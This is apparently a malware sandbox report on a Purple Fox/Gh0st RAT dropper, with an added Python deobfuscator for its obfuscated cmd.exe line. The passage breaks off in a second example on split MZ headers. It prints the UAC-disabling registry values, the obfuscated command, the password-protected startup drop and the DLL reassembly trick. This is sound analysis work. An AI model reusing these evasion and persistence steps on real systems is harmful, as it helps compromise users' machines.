Analysis
-
max time kernel
139s
-
max time network
150s
-
platform
windows10-2004_x64
-
resource
win10v2004-20220812-en
-
resource tags
arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
-
submitted
26-10-2022 22:49
Static task
static1
Behavioral task
behavioral1
Sample
e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe
Resource
win7-20220812-en
General
-
Target
e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe
-
Size
56KB
-
MD5
2c72f3642a2b4e17e8f54d4a8782c7f5
-
SHA1
55e76b2348a1affccc66df9389aae8b5d39d6c03
-
SHA256
e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90
-
SHA512
739bcf49f3c5250baaffe20d175e351192d612ef4f1774b71727529b425d809f2fcc2e1b7cce5124baebcd8979b1c599a7d6017ec6aaca086aeca57ee5004000
-
SSDEEP
768:ITlH3i10e6PQ5WKwl0JRGdGo3DhSZhmE2fI8+ZNX:UlHy1bsKwqJGGoGhmpfIfN
Malware Config
Signatures
-
Purple Fox rootkit 2 IoCs (yara rule purplefox_rootkit)
Processes:
resource | yara_rule
behavioral2/memory/4528-170-0x0000000010000000-0x000000001019F000-memory.dmp | purplefox_rootkit
behavioral2/memory/4528-176-0x0000000000400000-0x0000000000547000-memory.dmp | purplefox_rootkit
-
Gh0st RAT payload 2 IoCs
Processes:
resource | yara_rule
behavioral2/memory/4528-170-0x0000000010000000-0x000000001019F000-memory.dmp | family_gh0strat
behavioral2/memory/4528-176-0x0000000000400000-0x0000000000547000-memory.dmp | family_gh0strat
-
UAC bypass 3 IoCs
Processes:
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe
-
Downloads MZ/PE file
-
Executes dropped EXE 6 IoCs
Processes:
pid | process
1412 | k4.exe
4156 | k4.exe
2388 | unzip.exe
4468 | dllhosts.exe
4528 | dllhosts.exe
2972 | k4.exe
-
UPX packed file 4 IoCs (yara rule upx)
Processes:
resource | yara_rule
behavioral2/memory/4528-165-0x0000000000400000-0x0000000000547000-memory.dmp | upx
behavioral2/memory/4528-168-0x0000000000400000-0x0000000000547000-memory.dmp | upx
behavioral2/memory/4528-169-0x0000000000400000-0x0000000000547000-memory.dmp | upx
behavioral2/memory/4528-176-0x0000000000400000-0x0000000000547000-memory.dmp | upx
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | cmd.exe
-
Drops startup file 3 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\startup\ | unzip.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\startup\browser.lnk | unzip.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\startup\browser.lnk | unzip.exe
-
Loads dropped DLL 1 IoCs
Processes:
pid | process
4468 | dllhosts.exe
-
Checks whether UAC is enabled 1 IoCs
Processes:
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
description | ioc | process
File opened (read-only) | \??\B: \??\E: \??\F: \??\G: \??\H: \??\I: \??\J: \??\K: \??\L: \??\M: \??\N: \??\O: \??\P: \??\Q: \??\R: \??\S: \??\T: \??\U: \??\V: \??\W: \??\X: \??\Y: \??\Z: (23 drive letters; every letter except A:, C: and D:) | dllhosts.exe
-
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
Processes:
pid | process
4108 | cmd.exe
1020 | cmd.exe
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
description | pid | process | target process
PID 4468 set thread context of 4528 | 4468 | dllhosts.exe | dllhosts.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
pid | pid_target | process | target process
4680 | 4468 | WerFault.exe | dllhosts.exe
-
Checks SCSI registry key(s) 3 TTPs 2 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 | k4.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | k4.exe
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | dllhosts.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | dllhosts.exe
-
Kills process with taskkill 1 IoCs
Processes:
pid | process
4500 | taskkill.exe
-
Modifies registry class 2 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings | e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings | cmd.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid | process
4528 | dllhosts.exe (64 events)
-
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
pid | process
3124 | mmc.exe
-
Suspicious use of AdjustPrivilegeToken 14 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 4500 | taskkill.exe
Token: 33 | 4724 | mmc.exe
Token: SeIncBasePriorityPrivilege | 4724 | mmc.exe
Token: 33 | 4724 | mmc.exe
Token: SeIncBasePriorityPrivilege | 4724 | mmc.exe
Token: 33 | 3124 | mmc.exe
Token: SeIncBasePriorityPrivilege | 3124 | mmc.exe
Token: 33 | 3124 | mmc.exe
Token: SeIncBasePriorityPrivilege | 3124 | mmc.exe
Token: SeLoadDriverPrivilege | 2972 | k4.exe
Token: 33 | 4528 | dllhosts.exe
Token: SeIncBasePriorityPrivilege | 4528 | dllhosts.exe
Token: 33 | 4528 | dllhosts.exe
Token: SeIncBasePriorityPrivilege | 4528 | dllhosts.exe
-
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
pid | process
1260 | e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe (2 events)
4724 | mmc.exe (2 events)
3124 | mmc.exe (2 events)
-
Suspicious use of WriteProcessMemory 43 IoCs
Processes:
source pid / process -> target pid / process (events)
1260 e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe -> 1412 k4.exe (2)
1260 e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe -> 4156 k4.exe (2)
1260 e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe -> 1456 cmd.exe (3)
1456 cmd.exe -> 4500 taskkill.exe (3)
1260 e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe -> 1844 cmd.exe (3)
1260 e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe -> 3268 cmd.exe (3)
1260 e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe -> 1868 WScript.exe (3)
3268 cmd.exe -> 2324 WScript.exe (3)
4724 mmc.exe -> 4108 cmd.exe (2)
4108 cmd.exe -> 1020 cmd.exe (2)
4108 cmd.exe -> 4340 cmd.exe (2)
4340 cmd.exe -> 2404 cmd.exe (2)
2404 cmd.exe -> 2388 unzip.exe (3)
3124 mmc.exe -> 4468 dllhosts.exe (3)
4468 dllhosts.exe -> 4528 dllhosts.exe (5)
1260 e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe -> 2972 k4.exe (2)
-
System policy modification 1 TTPs 3 IoCs
Processes:
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe
Processes
-
Tree depth is shown as [n]; each entry gives the image path, then the command line, then the signatures hit. PIDs are taken from the signature tables above.

[1] C:\Users\Admin\AppData\Local\Temp\e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe (PID 1260)
    "C:\Users\Admin\AppData\Local\Temp\e09d36724c02199b6e92a6ff74f3f3fb5f48c0ee4cc66547e97b18dc488fbe90.exe"
    - UAC bypass
    - Checks computer location settings
    - Checks whether UAC is enabled
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    - System policy modification
    [2] C:\Users\Public\Documents\k4.exe (PID 1412)
        C:/Users/Public/Documents/k4.exe
        - Executes dropped EXE
    [2] C:\Users\Public\Documents\k4.exe (PID 4156)
        C:/Users/Public/Documents/k4.exe /D
        - Executes dropped EXE
    [2] C:\Windows\SysWOW64\cmd.exe (PID 1456)
        cmd.exe /c taskkill /f /t /im k4.exe
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\SysWOW64\taskkill.exe (PID 4500)
            taskkill /f /t /im k4.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
    [2] C:\Windows\SysWOW64\cmd.exe (PID 1844)
        cmd /c copy /b C:\\Users\\Public\\Documents\\MZ.txt+C:\\Users\\Public\\Documents\\TAS.txt C:\\Users\\Public\\Documents\\TASLoginBase.dll
    [2] C:\Windows\SysWOW64\cmd.exe (PID 3268)
        cmd /c C:\Users\Public\Documents\2022060125.vbe
        - Checks computer location settings
        - Modifies registry class
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\SysWOW64\WScript.exe (PID 2324)
            "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\2022060125.vbe"
    [2] C:\Windows\SysWOW64\WScript.exe (PID 1868)
        "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sch.vbe"
    [2] C:\Users\Public\Documents\k4.exe (PID 2972)
        "C:\Users\Public\Documents\k4.exe" /E
        - Executes dropped EXE
        - Checks SCSI registry key(s)
        - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\system32\mmc.exe (PID 4724)
    C:\Windows\system32\mmc.exe -Embedding
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    [2] C:\WINDOWS\system32\cmd.exe (PID 4108)
        "C:\WINDOWS\system32\cmd.exe" /c ^c^M^D, , /v^:O ,/R " , ( , (S^ET ^l^U=^-), )&(^sET N^aV=\^Public^\Docu^m^en^t)& (^s^eT ^S^m^KR=^ver)&&(, ,, , , (^sET idZ^S=cmd ^/c C:\^U^sers^\Publi^c\Do^cu) ,)&& (sE^t ^ ^5UR2=s\^unz^ip.^d^a^t -d)&&(^sET ^b^Vx=xe^ ^-^o)& ( , (^Set ^PXyG=^e^rver^^^^^^^>Se^r) )&(s^ET ^ w^GR=:\^U^sers)&( , , , , , (^SE^t G^2T=^ ), )& (^Se^T ^78=^men^ts^\un^zip.e)& (^Set B^X=^ ""%ap^pda^ta%"")& (^SEt p^1vS=P^ )&(S^et DBh^u=^^^^^^^&^e^cho ^S)&& S^ET ^u^Yw^J=""&&( , (^SET 7D3^y=^.^dll) , )& ( ,(^SET ^ ^gE=^C) , )&& ( , (SE^T ^ ^2^R^X=Start^u^p8^888 ) , , , )& , C^All,S^E^T 4Zb=%idZ^S%%^78%%^b^Vx%%G^2T%%^l^U%%p^1vS%%^2^R^X%%^gE%%w^GR%%N^aV%%^5UR2%%B^X%%DBh^u%%^PXyG%%^S^m^KR%%7D3^y%&&, , ^CaLL , , E^CHo , %4^Z^b:""^=!uY^wJ:~0, ^-1!%"|,%pubLic:~ 14%MD,
        - An obfuscated cmd.exe command-line is typically used to evade detection.
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\cmd.exe (PID 1020)
            cMD , , /v:O ,/R " , ( , (S^ET ^l^U=^-), )&(^sET N^aV=\^Public^\Docu^m^en^t)& (^s^eT ^S^m^KR=^ver)&&(, ,, , , (^sET idZ^S=cmd ^/c C:\^U^sers^\Publi^c\Do^cu) ,)&& (sE^t ^ ^5UR2=s\^unz^ip.^d^a^t -d)&&(^sET ^b^Vx=xe^ ^-^o)& ( , (^Set ^PXyG=^e^rver^^^^^^^>Se^r) )&(s^ET ^ w^GR=:\^U^sers)&( , , , , , (^SE^t G^2T=^ ), )& (^Se^T ^78=^men^ts^\un^zip.e)& (^Set B^X=^ ""%ap^pda^ta%"")& (^SEt p^1vS=P^ )&(S^et DBh^u=^^^^^^^&^e^cho ^S)&& S^ET ^u^Yw^J=""&&( , (^SET 7D3^y=^.^dll) , )& ( ,(^SET ^ ^gE=^C) , )&& ( , (SE^T ^ ^2^R^X=Start^u^p8^888 ) , , , )& , C^All,S^E^T 4Zb=%idZ^S%%^78%%^b^Vx%%G^2T%%^l^U%%p^1vS%%^2^R^X%%^gE%%w^GR%%N^aV%%^5UR2%%B^X%%DBh^u%%^PXyG%%^S^m^KR%%7D3^y%&&, , ^CaLL , , E^CHo , %4^Z^b:""^=!uY^wJ:~0, ^-1!%"
            - An obfuscated cmd.exe command-line is typically used to evade detection.
        [3] C:\Windows\system32\cmd.exe (PID 4340)
            cMD ,
            - Suspicious use of WriteProcessMemory
            [4] C:\Windows\system32\cmd.exe (PID 2404)
                cmd /c C:\Users\Public\Documents\unzip.exe -o -P Startup8888 C:\Users\Public\Documents\unzip.dat -d "C:\Users\Admin\AppData\Roaming"
                - Suspicious use of WriteProcessMemory
                [5] C:\Users\Public\Documents\unzip.exe (PID 2388)
                    C:\Users\Public\Documents\unzip.exe -o -P Startup8888 C:\Users\Public\Documents\unzip.dat -d "C:\Users\Admin\AppData\Roaming"
                    - Executes dropped EXE
                    - Drops startup file

[1] C:\Windows\system32\mmc.exe (PID 3124)
    C:\Windows\system32\mmc.exe -Embedding
    - Suspicious behavior: SetClipboardViewer
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    [2] C:\Users\Public\Documents\dllhosts.exe (PID 4468)
        "C:\Users\Public\Documents\dllhosts.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of SetThreadContext
        - Suspicious use of WriteProcessMemory
        [3] C:\Users\Public\Documents\dllhosts.exe (PID 4528)
            C:\Users\Public\Documents\dllhosts.exe
            - Executes dropped EXE
            - Enumerates connected drives
            - Checks processor information in registry
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
        [3] C:\Windows\SysWOW64\WerFault.exe (PID 4680)
            C:\Windows\SysWOW64\WerFault.exe -u -p 4468 -s 252
            - Program crash

[1] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4468 -ip 4468
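The two cmd.exe command lines under mmc.exe above never contain the real command as a string: it is cut into SET pieces with random names, every other character is escaped with a caret, the pieces are concatenated by CALL SET, a doubled-quote trick is undone by a !var:~0,-1! substring, and the result is echoed into a second cmd.exe. The following is an added example for this report (not code from the sandbox or from the sample) that models the three cmd.exe parsing steps involved, caret removal, SET collection and %var% / !var! expansion with the :~start,len and :old=new operators, just far enough to recover the command. The APPDATA value is an assumption taken from the child process shown in the tree, and caret and quote handling cover only the cases this sample uses.

```python
"""Recover the command hidden by the caret-and-SET obfuscation in the
mmc.exe -> cmd.exe chain of this report. Added example, not part of the page."""
import re

# Command line of the depth-3 cmd.exe, copied from the process tree.
OBFUSCATED = r'''cMD , , /v:O ,/R " , ( , (S^ET ^l^U=^-), )&(^sET N^aV=\^Public^\Docu^m^en^t)& (^s^eT ^S^m^KR=^ver)&&(, ,, , , (^sET idZ^S=cmd ^/c C:\^U^sers^\Publi^c\Do^cu) ,)&& (sE^t ^ ^5UR2=s\^unz^ip.^d^a^t -d)&&(^sET ^b^Vx=xe^ ^-^o)& ( , (^Set ^PXyG=^e^rver^^^^^^^>Se^r) )&(s^ET ^ w^GR=:\^U^sers)&( , , , , , (^SE^t G^2T=^ ), )& (^Se^T ^78=^men^ts^\un^zip.e)& (^Set B^X=^ ""%ap^pda^ta%"")& (^SEt p^1vS=P^ )&(S^et DBh^u=^^^^^^^&^e^cho ^S)&& S^ET ^u^Yw^J=""&&( , (^SET 7D3^y=^.^dll) , )& ( ,(^SET ^ ^gE=^C) , )&& ( , (SE^T ^ ^2^R^X=Start^u^p8^888 ) , , , )& , C^All,S^E^T 4Zb=%idZ^S%%^78%%^b^Vx%%G^2T%%^l^U%%p^1vS%%^2^R^X%%^gE%%w^GR%%N^aV%%^5UR2%%B^X%%DBh^u%%^PXyG%%^S^m^KR%%7D3^y%&&, , ^CaLL , , E^CHo , %4^Z^b:""^=!uY^wJ:~0, ^-1!%"'''

# Constructed for the example: the one environment variable the payload reads.
# The value is assumed from the child process in the tree, not read from the sample.
SANDBOX_ENV = {"APPDATA": r"C:\Users\Admin\AppData\Roaming"}

TERMINATORS = set("&|<>)")   # unescaped, these end a SET value on a command line


def caret_pass(s):
    """One cmd.exe caret pass ('^x' -> 'x'); returns [(char, was_escaped)]."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "^" and i + 1 < len(s):
            out.append((s[i + 1], True))
            i += 2
        else:
            out.append((s[i], False))
            i += 1
    return out


def strip_carets(s):
    return "".join(c for c, _ in caret_pass(s))


def collect_sets(chars):
    """Return ({lowercase name: raw value}, flat text) for every SET name=value."""
    text = "".join(c for c, _ in chars)
    variables = {}
    for m in re.finditer(r"(?i)\bset\s+(\w+)=", text):
        j, value = m.end(), []
        while j < len(text) and not (text[j] in TERMINATORS and not chars[j][1]):
            value.append(text[j])
            j += 1
        variables[m.group(1).lower()] = "".join(value)
    return variables, text


def expand(text, scope):
    """%var% then !var! expansion with the :~start[,len] and :old=new operators."""
    for d in ("%", "!"):
        pat = re.compile(d + r"(\w+)(?::~\s*(-?\d+)\s*(?:,\s*(-?\d+))?"
                         r"|:([^=" + d + r"]+)=([^" + d + r"]*))?" + d)

        def repl(m):
            name, start, length, old, new = m.groups()
            if name.lower() not in scope:
                return m.group(0)     # undefined names stay literal on the command line
            val = scope[name.lower()]
            if start is not None:
                s = int(start)
                s = max(len(val) + s, 0) if s < 0 else min(s, len(val))
                if length is None:
                    return val[s:]
                n = int(length)
                return val[s:len(val) + n] if n < 0 else val[s:s + n]
            if old is not None:
                return val.replace(old, new)
            return val

        text = pat.sub(repl, text)
    return text


def split_commands(line):
    """Split on '&' outside double quotes, the way cmd.exe runs the pieces."""
    parts, cur, quoted = [], [], False
    for ch in line:
        if ch == '"':
            quoted = not quoted
        if ch == "&" and not quoted:
            parts.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    parts.append("".join(cur).strip())
    return [p for p in parts if p]


def deobfuscate(cmdline, env):
    chars = caret_pass(cmdline)                      # phase 2 of the receiving cmd.exe
    variables, text = collect_sets(chars)
    raw = {k.lower(): v for k, v in env.items()}
    raw.update(variables)
    scope = dict(raw)
    # CALL SET re-runs percent expansion (so %appdata% inside a piece resolves)
    # and applies one more caret pass to the assembled value.
    for name, value in variables.items():
        scope[name] = strip_carets(expand(expand(value, raw), raw))
    # CALL ECHO <expr>: expand the last echo argument, then strip its carets.
    arg = re.match(r'(?is).*\becho\s*,?\s*(.*?)"?\s*$', text).group(1)
    echoed = strip_carets(expand(arg, scope))
    return {"variables": scope, "echoed": echoed, "commands": split_commands(echoed)}


if __name__ == "__main__":
    result = deobfuscate(OBFUSCATED, SANDBOX_ENV)
    for piece, value in result["variables"].items():
        print(f"{piece:8} = {value!r}")
    print("piped into cMD:", result["echoed"])
```

The first recovered command is exactly the depth-4 cmd.exe in the tree (unzip.exe with the password Startup8888 into %APPDATA%); the second, echo Server>Server.dll, leaves a one-line file in the working directory and is the only part the process tree does not show. The same model explains the outer line: %pubLic:~ 14%MD is the 15th character of C:\Users\Public followed by MD, i.e. cMD, which is why the pipe target appears as "cMD ," at depth 3.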
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Public\Documents\2022060125.vbe
Filesize 180B
MD5 d66c7e77096d4f4c406170b6ca0ad123
SHA1 9bb461061c7276ebe2a493f690d72263c0da8962
SHA256 cd0a0ac1315f1f473f4a42bed62fad7033fe68a3e0cf72a7b354a7e3dd78e8a8
SHA512 015788021b53eb278be1238b26a01499dcb809d93ee747bc89208f8d3570a7b0b813c70ea054e70584b536da4811f0a58ef38c96a984e6b3a54654774e5c7592
-
C:\Users\Public\Documents\MZ.txt
Filesize 2B
MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b
-
C:\Users\Public\Documents\TAS.txt
Filesize 118KB
MD5 9efe1bc9713459a517a348502319bfa2
SHA1 bffe5ad1bb71e39deb5b384ebd3220f1158e43e4
SHA256 d9203f15b1d230e7a7955b7ba01d1877a4a323129c845ae31f1bf0b84aa51077
SHA512 80d1e08bb880c019f852441a9af257b48a52efb81a26d2f5c89909c79f63261e62a0b68df798193d7b32d40cda56cad1f85faf6344971aab799fa9f26591af07
-
C:\Users\Public\Documents\TASLoginBase.dll
Filesize 119KB
MD5 b3e30cbd7f8042c7141a3957a33399a4
SHA1 1f808c68f20c396898ff95edd9fb154fc6f86840
SHA256 edae6213d100b2a99079e7211adaefdd469edd0fa75b3146bd710a0aab83d833
SHA512 b9061402648c1aba42665cf93a4e02d5aefe9ef5e409d21a715ae9e71ed4eb8de5c39bb3c47b69cd3b94a9a5e13e63c685c2cc92e4c4354be2cb2ade771547ff
-
C:\Users\Public\Documents\dllhosts.exe
Filesize 411KB
MD5 66557b2bd93e70a2804e983b279ab473
SHA1 4e58505689fd9643b5011880ce94b22cbfadf917
SHA256 a63c9e3f7256e38224f7256307d954d4a6baa9f023f6ac49d8cface7b2658e31
SHA512 b08d8b2872f4ebdbab7b15bd96f5d185f05030983c2d704497d30fe5f610874b5ec362f0e3e55800031edcd29b812d9b58214e76012a85df074310f36e0f33f4
-
C:\Users\Public\Documents\k4.exe
Filesize 892KB
MD5 33e29221e2825001d32f78632217d250
SHA1 9122127fc91790a1edb78003e9b58a9b00355ed5
SHA256 65d0b20a4dc4911fbb91683eb6488d3d3493fa4584bbdfb4e942f203bef0030d
SHA512 01d5c6ded3a83d81371e94fefb1debabb1d003c86ab3cf7145d28fb15fcfd4f8b763f6711f99c5afd9bf90f02a7af993efa5945d4f8bb6a3649b5fd86414ae93
-
C:\Users\Public\Documents\sch.vbe
Filesize 179B
MD5 d569f44ce5792ee816b4182e3c7bc7da
SHA1 f16a402cd6030b5c7faa5c85ade3005d66d5232a
SHA256 59ff328647ccee11ad437e02b6e84c12511333553837b6fa270eefd21a3eccbf
SHA512 bb0f888ff00038d1787e6cce8b09b61761d93594cbfe08d2dbf650c1802938d6df7b4b854c1af97ad405fb3b1460aab339e636852d51dc6b6849d27a5af9560b
-
C:\Users\Public\Documents\unzip.dat
Filesize 1KB
MD5 e1fafb36f4da2c3be5dc9be1ad0b9805
SHA1 7d64a899e0ab62f3cd6ebf5bdade782c99c00713
SHA256 a862acb112f57458ad35e5e5fc90f0d270a7600af694a6b7052d161806e5dd69
SHA512 5c530b09b6459f34072dfccb7ccec5cbb791fc6cdc2633993da91fbef9c4d1172aec51ace3fb3cb8ac25b6721b4e6f5f1fd1a8fac7d95abbad8f6430e4abbc3e
-
C:\Users\Public\Documents\unzip.exe
Filesize 164KB
MD5 75375c22c72f1beb76bea39c22a1ed68
SHA1 e1652b058195db3f5f754b7ab430652ae04a50b8
SHA256 8d9b5190aace52a1db1ac73a65ee9999c329157c8e88f61a772433323d6b7a4a
SHA512 1b396e78e189185eefb8c6058aa7e6dfe1b8f2dff8babfe4ffbee93805467bf45760eea6efb8d9bb2040d0eaa56841d457b1976dcfe13ed67931ade01419f55a
-
C:\Users\Public\Documents\unzip.lnk
Filesize 2KB
MD5 7503a871168c07ca47a87c933f004f66
SHA1 764d09fe3b1f756a467e4a96d5cc3453732c3cfb
SHA256 8a3d404f5cdd1611433ea97e8a5ebf8696d8cdcf805331201a4fb4f7203023de
SHA512 4f7bbab0fcdb150cf368ab9fa2d23f26082ae1ac1d1a4cebc7ea9b2724125c7f5e013b2180a08a3f0002e416e6be5e6233f47fb7f5dbebd1b503f09a5ea24831
-
C:\Users\Public\Documents\update.lnk
Filesize 1KB
MD5 3af508a542bdfa6927737a2d91d74f40
SHA1 433f04e960f68ce05358af2d672a9b649de4e3ce
SHA256 e7e3e44142369b3a312005313f8569f2bcd45bcdc8ea9e141616654bcd090b60
SHA512 b35ad011ca3770c1a1e2a655a614e91ebd96ce29099969c727a69e77a390b91078512ce55883d7290e4dd46c5f04f0461b2833f568d23da1fc4d91ea4633d3bc
-
C:\Users\Public\Documents\update.log
Filesize 539KB
MD5 721a8a8725655659c2f93fce960918c7
SHA1 a9d5e880b15e3ea8eb0310293b0309c26bfa5fe5
SHA256 644bb5f01223161bd1f763115c7addfa710c2c1c11446a11cac7eb44dc677cf2
SHA512 8e86944f47ba050348ec71ec79c940e9e61453ac76bb0c5da4a9ff51b45ef20931c3b5a1132d93a83d631fbf84bddcc5fc34ded82775c47ec08d8677f0f9c127
-
memory/1020-150-0x0000000000000000-mapping.dmp
-
memory/1412-132-0x0000000000000000-mapping.dmp
-
memory/1456-137-0x0000000000000000-mapping.dmp
-
memory/1844-139-0x0000000000000000-mapping.dmp
-
memory/1868-144-0x0000000000000000-mapping.dmp
-
memory/2324-145-0x0000000000000000-mapping.dmp
-
memory/2388-153-0x0000000000000000-mapping.dmp
-
memory/2404-152-0x0000000000000000-mapping.dmp
-
memory/2972-177-0x0000000000000000-mapping.dmp
-
memory/3268-142-0x0000000000000000-mapping.dmp
-
memory/4108-148-0x0000000000000000-mapping.dmp
-
memory/4156-135-0x0000000000000000-mapping.dmp
-
memory/4340-151-0x0000000000000000-mapping.dmp
-
memory/4468-163-0x0000000000400000-0x0000000000490000-memory.dmp
Filesize 576KB
-
memory/4468-158-0x0000000000000000-mapping.dmp
-
memory/4500-138-0x0000000000000000-mapping.dmp
-
memory/4528-168-0x0000000000400000-0x0000000000547000-memory.dmp
Filesize 1.3MB
-
memory/4528-169-0x0000000000400000-0x0000000000547000-memory.dmp
Filesize 1.3MB
-
memory/4528-170-0x0000000010000000-0x000000001019F000-memory.dmp
Filesize 1.6MB
-
memory/4528-176-0x0000000000400000-0x0000000000547000-memory.dmp
Filesize 1.3MB
-
memory/4528-165-0x0000000000400000-0x0000000000547000-memory.dmp
Filesize 1.3MB
-
memory/4528-164-0x0000000000000000-mapping.dmp
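The copy /b step in the process tree joins MZ.txt (2 B) and TAS.txt (118 KB) into TASLoginBase.dll (119 KB): the DLL is shipped with its two-byte DOS magic split off, so neither dropped file starts with MZ and neither looks like a PE to a scanner that keys on the header, until cmd.exe concatenates them. The following is an added example for this report (not code from the sandbox or the sample) that reproduces the split and the copy /b reassembly on a constructed minimal PE-like blob, validates the rebuilt header the way an analyst would, and shows the check that flags a body file whose only missing piece is the magic. The blob, its Machine value and section count are made up for the example; the real DLL is not parsed.

```python
"""Split-off 'MZ' magic: rebuild and verify a PE the way 'copy /b a+b c' does.
Added example for this report; the sample blob below is constructed, not the
real TASLoginBase.dll."""
import struct

MZ = b"MZ"
PE_SIG = b"PE\0\0"


def pe_headers(data):
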